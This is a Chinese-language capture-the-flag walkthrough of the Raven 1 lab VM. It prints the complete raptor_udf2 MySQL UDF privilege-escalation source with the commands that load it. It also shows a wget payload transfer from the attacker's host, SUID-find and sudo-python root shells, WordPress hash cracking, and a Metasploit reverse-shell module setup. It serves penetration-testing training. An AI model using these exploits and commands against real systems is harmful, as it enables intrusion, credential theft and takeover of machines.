LinEnum.sh
michael@Raven:/tmp$ ls -la
total 76
drwxrwxrwt  7 root    root     4096 Feb 15 04:46 .
drwxr-xr-x 22 root    root     4096 Aug 13  2018 ..
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .font-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .ICE-unix
-rwxrwxrwx  1 michael michael 46476 Dec 21 00:44 LinEnum.sh
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .Test-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .X11-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .XIM-unix

然后运行脚本发现下面敏感信息输出结果如下
发现MySQL服务正在运行（端口3306很明显）。

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:60286           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::39258                :::*                    LISTEN      -               

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:8641            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:43233           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:995             0.0.0.0:*                           -               
udp        0      0 127.0.0.1:1005          0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp6       0      0 :::11443                :::*                                -               
udp6       0      0 :::995                  :::*                                -               
udp6       0      0 :::52570                :::*                                -               
udp6       0      0 :::111                  :::*                                -

发现了一个MySQL开发漏洞，远程root代码执行，Privesc漏洞！

参考MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662

root       547  0.0  0.3   4340  1620 ?        S    04:11   0:00 /bin/sh /usr/bin/mysqld_safe
root       895  0.0  4.5 232508 23072 ?        Ss   04:11   0:00 /usr/sbin/apache2 -k start
root       922  0.0 10.2 814920 51920 ?        Sl   04:12   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data   986  0.0  7.3 238928 37300 ?        S    04:12   0:00 /usr/sbin/apache2 -k start
www-data   987  0.0  6.8 236172 34664 ?        S    04:12   0:00 /usr/sbin/apache2 -k start
www-data   988  0.0  6.1 234084 31328 ?        S    04:12   0:00 /usr/sbin/apache2 -k start

因此，将当前目录更改为/var/www/html/wordpress并搜索了wp-config文件，因为该文件具有MySQL数据库的密码。

michael@Raven:/tmp$ cd /var/www/html/wordpress
michael@Raven:/var/www/html/wordpress$ ls
index.php    wp-activate.php     wp-comments-post.php  wp-content   wp-links-opml.php  wp-mail.php      wp-trackback.php
license.txt  wp-admin            wp-config.php         wp-cron.php  wp-load.php        wp-settings.php  xmlrpc.php
readme.html  wp-blog-header.php  wp-config-sample.php  wp-includes  wp-login.php       wp-signup.php
michael@Raven:/var/www/html/wordpress$ cat wp-con
wp-config.php         wp-config-sample.php  wp-content/           
michael@Raven:/var/www/html/wordpress$ cat wp-config.php 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '0&ItXmn^q2d[e*yB:9,L:rR<B`h+DG,zQ&SN{Or3zalh.JE+Q!Gi:L7U[(T:J5ay');
define('SECURE_AUTH_KEY',  'y@^[*q{)NKZAKK{,AA4y-Ia*swA6/O@&*r{+RS*N!p1&a$*ctt+ I/!?A/Tip(BG');
define('LOGGED_IN_KEY',    '.D4}RE4rW2C@9^Bp%#U6i)?cs7,@e]YD:R~fp#hXOk$4o/yDO8b7I&/F7SBSLPlj');
define('NONCE_KEY',        '4L{Cq,%ce2?RRT7zue#R3DezpNq4sFvcCzF@zdmgL/fKpaGX:EpJt/]xZW1_H&46');
define('AUTH_SALT',        '@@?u*YKtt:o/T&V;cbb`.GaJ0./S@dn$t2~n+lR3{PktK]2,*y/b%<BH-Bd#I}oE');
define('SECURE_AUTH_SALT', 'f0Dc#lKmEJi(:-3+x.V#]Wy@mCmp%njtmFb6`_80[8FK,ZQ=+HH/$& mn=]=/cvd');
define('LOGGED_IN_SALT',   '}STRHqy,4scy7v >-..Hc WD*h7rnYq]H`-glDfTVUaOwlh!-/?=3u;##:Rj1]7@');
define('NONCE_SALT',       'i(#~[sXA TbJJfdn&D;0bd`p$r,~.o/?%m<H+<>Vj+,nLvX!-jjjV-o6*HDh5Td{');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

发现密码为：

R@v3nSecurity

发现第一个flag

michael@Raven:/var/www/html/wordpress$ find / -name "flag*" 2>/dev/null
/var/www/flag2.txt
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
michael@Raven:/var/www/html/wordpress$ cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

mysql udf提权

因此，搜索了UDF动态库漏洞利用程序，并在漏洞利用数据库中将其命名为“1518.c”。

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

/*
 * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
 *
 * raptor_udf2.c - dynamic library for do_system() MySQL UDF
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This is an helper dynamic library for local privilege escalation through
 * MySQL run with root privileges (very bad idea!), slightly modified to work 
 * with newer versions of the open-source database. Tested on MySQL 4.1.14.
 *
 * See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
 *
 * Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
 * for the security vulnerabilities in the handling of User Defined Functions
 * (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
 * details, please refer to:
 *
 * http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
 * http://www.wisec.it/vulns.php?page=4
 * http://www.wisec.it/vulns.php?page=5
 * http://www.wisec.it/vulns.php?page=6
 *
 * "UDFs should have at least one symbol defined in addition to the xxx symbol 
 * that corresponds to the main xxx() function. These auxiliary symbols 
 * correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and 
 * xxx_add() functions". -- User Defined Functions Security Precautions 
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
 *
 */

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
	unsigned int		arg_count;	// number of arguments
	enum Item_result	*arg_type;	// pointer to item_result
	char 			**args;		// pointer to arguments
	unsigned long		*lengths;	// length of string args
	char			*maybe_null;	// 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
	char			maybe_null;	// 1 if func can return NULL
	unsigned int		decimals;	// for real functions
	unsigned long 		max_length;	// for string functions
	char			*ptr;		// free ptr for func data
	char			const_item;	// 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
	return(0);
}

// milw0rm.com [2006-02-20]

该漏洞利用是通过将原始C代码编译为“.so”文件，将其传输到受害计算机并利用MySQL漏洞来运行的。第一步是对其进行编译。

root@kali:~/vulnhub/raven1# cp /usr/share/exploitdb/exploits/linux/local/1518.c .
root@kali:~/vulnhub/raven1# ls
1518.c
root@kali:~/vulnhub/raven1# gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
root@kali:~/vulnhub/raven1# ls
1518.c  1518.so

然后，启动了本地服务器，并将此1518.so文件传输到受害人的/tmp目录，因为使用wget命令可以通用地读取和写入该文件。

root@kali:~/vulnhub/raven1# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [14/Feb/2020 05:55:48] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [14/Feb/2020 05:55:55] "GET / HTTP/1.1" 200 -
192.168.56.118 - - [14/Feb/2020 05:56:12] "GET /1518.so HTTP/1.1" 200 -

michael@Raven:/tmp$ wget 192.168.56.102:8000/1518.so
--2020-02-15 05:56:10--  http://192.168.56.102:8000/1518.so
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19088 (19K) [application/octet-stream]
Saving to: ‘1518.so’

1518.so                        100%[=====================================================>]  18.64K  --.-KB/s   in 0s     

2020-02-15 05:56:10 (150 MB/s) - ‘1518.so’ saved [19088/19088]

michael@Raven:/tmp$ chmod 777 *
michael@Raven:/tmp$ ls -la
total 152
drwxrwxrwt  7 root    root     4096 Feb 15 05:56 .
drwxr-xr-x 22 root    root     4096 Aug 13  2018 ..
-rwxrwxrwx  1 michael michael 19088 Feb 14 21:50 1518.so
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .font-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .ICE-unix
-rwxrwxrwx  1 michael michael 55193 Feb 15 04:48 info.txt
-rwxrwxrwx  1 michael michael 46476 Dec 21 00:44 LinEnum.sh
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .Test-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .X11-unix
drwxrwxrwt  2 root    root     4096 Feb 15 04:11 .XIM-unix

下面连接数据库开始提权

michael@Raven:/tmp$ mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 70
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql>

在获得MySQL Shell之后，开始使用刚刚发现的漏洞来利用它

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

现在，创建一个名为“foo”的表在此表中，将链接插入了刚刚从本地计算机导入到/tmp目录的1518.so文件。将相同的文件转储到/usr/lib/mysql/plugin/目录（因为它容易受到攻击）在最重要的步骤中，创建了一个名为do_system的UDF函数，该函数将调用实现该函数的代码。因此，正在调用代码“chmod u + s /usr/bin/ find”以将粘性位设置为“find”

mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/tmp/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

现在，遍历目录/tmp并使用find程序执行命令。

michael@Raven:/tmp$ touch raj
michael@Raven:/tmp$ find raj -exec "whoami" \;
root
michael@Raven:/tmp$ find raj -exec "/bin/sh" \;
# id
uid=1000(michael) gid=1000(michael) euid=0(root) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
root
# cd /root
# ls
flag4.txt
# cat flag4.txt 
______                      

| ___ \                     

| |_/ /__ ___   _____ _ __  

|    // _` \ \ / / _ \ '_ \ 

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|

                            
flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io

到这一步找到了第二个flag

提权方法二

如上所述到达MySQL Shell，然后采用替代方法。查看所有数据库，并从“WordPress”数据库中的wp_users表中转储用户名

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

发现了两个哈希值，但是由于已经知道了Michael的密码，因此使用hashcat通过将哈希值粘贴到名为“password.txt”的文本文件中来破解了Steven的密码。
由于gpu性能太强，一秒出密码

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 400 password.txt D:/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
             We are waiting for updated OpenCL drivers from Intel.
             You can use --force to override, but do not report related errors.
nvmlInit(): Unknown Error

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) UHD Graphics 630, skipped.
* Device #3: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: D:/wordlists/rockyou.txt
* Passwords.: 14344360
* Bytes.....: 139921318
* Keyspace..: 14344360

$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/:pink84

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
Time.Started.....: Fri Feb 14 19:47:16 2020 (1 sec)
Time.Estimated...: Fri Feb 14 19:47:17 2020 (0 secs)
Guess.Base.......: File (D:/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1114.4 kH/s (7.11ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 524288/14344360 (3.66%)
Rejected.........: 0/524288 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidates.#1....: 123456 -> chadj85
Hardware.Mon.#1..: N/A

Started: Fri Feb 14 19:47:10 2020
Stopped: Fri Feb 14 19:47:19 2020

得到密码为pink84

当然也可以用john来破解，更加的方便，但是所需时间更长

root@kali:~/vulnhub/raven1# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
pink84           (?)
1g 0:00:01:17 DONE 3/3 (2020-02-14 06:52) 0.01287g/s 47616p/s 47616c/s 47616C/s poslus..pingar
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

登录到steven的shell并运行sudo -l命令，发现Python不需要root权限即可运行。因此，使用python的单行代码生成了python PTY shell。

michael@Raven:/tmp$ su steven
Password: 
$ sudo -l
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@Raven:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/tmp# whoami
root
root@Raven:/tmp#

可以看到成功的提升到了root权限的shell

root@Raven:/tmp# find / -name "flag*" 2>/dev/null
/var/www/flag2.txt
/root/flag4.txt
/usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags

发现还是只有两个flag文件

/var/www/flag2.txt
/root/flag4.txt

继续寻找剩下的两个flag

通过目录扫描发现下面的url

http://192.168.56.118/service.html

右键查看源码，发现flag

<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

还剩下最后一个flag，再次连接数据库，进入数据库查找

root@Raven:~# mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_posts;
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| ID | post_author | post_date           | post_date_gmt       | post_content                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            | post_title   | post_excerpt | post_status | comment_status | ping_status | post_password | post_name     | to_ping | pinged | post_modified       | post_modified_gmt   | post_content_filtered | post_parent | guid                                                             | menu_order | post_type | post_mime_type | comment_count |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
|  1 |           1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing!                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   | Hello world! |              | publish     | open           | open        |               | hello-world   |         |        | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 |                       |           0 | http://192.168.206.131/wordpress/?p=1                            |          0 | post      |                |             1 |
|  2 |           1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

<blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote>

...or something like this:

<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>

As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page  |              | publish     | closed         | open        |               | sample-page   |         |        | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 |                       |           0 | http://192.168.206.131/wordpress/?page_id=2                      |          0 | page      |                |             0 |
|  4 |           1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag3        |              | draft       | open           | open        |               |               |         |        | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 |                       |           0 | http://raven.local/wordpress/?p=4                                |          0 | post      |                |             0 |
|  5 |           1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag4        |              | inherit     | closed         | closed      |               | 4-revision-v1 |         |        | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 |                       |           4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ |          0 | revision  |                |             0 |
|  7 |           2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 | flag3        |              | inherit     | closed         | closed      |               | 4-revision-v1 |         |        | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 |                       |           4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ |          0 | revision  |                |             0 |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
5 rows in set (0.00 sec)

最后一个flag,flag3终于找到

flag3{afc01ab56b50591e7dccf93122770cd2}

使用msf进行getshell的方法

msf5 exploit(multi/http/phpmailer_arg_injection) > show options

Module options (exploit/multi/http/phpmailer_arg_injection):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.56.118   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /contact.php     yes       Path to the application root
   TRIGGERURI  /                no        Path to the uploaded payload
   VHOST                        no        HTTP server virtual host
   WEB_ROOT    /var/www/html    yes       Path to the web root


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.102   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHPMailer <5.2.18


msf5 exploit(multi/http/phpmailer_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444 
